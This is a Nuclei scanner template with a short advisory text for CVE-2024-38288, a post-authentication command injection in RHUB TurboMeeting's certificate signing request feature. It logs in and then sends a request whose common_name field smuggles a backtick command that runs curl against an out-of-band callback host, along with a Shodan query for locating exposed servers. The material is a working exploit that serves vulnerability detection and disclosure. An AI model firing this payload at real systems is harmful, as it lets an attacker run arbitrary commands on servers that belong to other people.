The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges.
PoC代码[已公开]
id: CVE-2024-38288
info:
name: TurboMeeting - Post-Authentication Command Injection
author: rootxharsh,iamnoooob,pdresearch
severity: high
description: |
The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges.
reference:
- https://github.com/google/security-research/security/advisories/GHSA-gx6g-8mvx-3q5c
- https://www.rhubcom.com/v5/manuals.html
classification:
epss-score: 0.61781
epss-percentile: 0.98291
cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: html:"TurboMeeting"
product: turbomeeting
vendor: rhubcom
tags: cve,cve2024,rce,turbomeeting,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /as/wapi/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
next_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login
matchers:
- type: word
part: body
words:
- "as/wapi/profile_entry?sid="
internal: true
extractors:
- type: regex
name: sid
part: body
group: 1
regex:
- 'sid=(.*?)"'
internal: true
- raw:
- |
@timeout: 20s
POST /as/wapi/generate_csr HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR
matchers-condition: and
matchers:
- type: word
part: body
words:
- CSR
- SSL
condition: and
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "dns"
# digest: 4a0a00473045022100a2ac902fa9ca748424182126653cca0c957ce110567211b56acee74b17163a0b022027775c55111a9c4a350fe2091ec2e6b4973314ad887ecc5b0d177b1a41ba1497:922c64590222798bb761d5b6d8e72950